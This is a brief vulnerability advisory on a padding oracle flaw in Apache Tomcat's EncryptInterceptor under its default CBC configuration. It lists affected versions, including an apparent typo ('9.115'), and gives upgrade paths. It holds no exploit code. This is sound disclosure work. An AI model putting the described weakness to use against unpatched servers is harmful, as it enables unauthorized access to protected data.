Avi Lumelsky

**Name of the Vulnerable Software and Affected Versions** Apache Tomcat versions 11.0.0-M1 through 11.0.18 Apache Tomcat versions 10.0.0-M1 through 10.1.52 Apache Tomcat versions 9.0.13 through 9.115 Apache Tomcat versions 8.5.38 through 8.5.100 Apache Tomcat versions 7.0.100 through 7.0.109 **Description** A Padding Oracle issue exists in the `EncryptInterceptor` when using the default configuration, as it utilizes CBC (Cipher Block Chaining) mode. This flaw is related to deficiencies in the error reporting mechanism, which could allow a remote attacker to perform a Padding Oracle attack to gain unauthorized access to protected information. **Recommendations** Upgrade versions 11.0.0-M1 through 11.0.18 to 11.0.19. Upgrade versions 10.0.0-M1 through 10.1.52 to 10.1.53. Upgrade versions 9.0.13 through 9.115 to 9.0.116. At the moment, there is no information about a newer version that contains a fix for Apache Tomcat versions 8.5.38 through 8.5.100 and 7.0.100 through 7.0.109.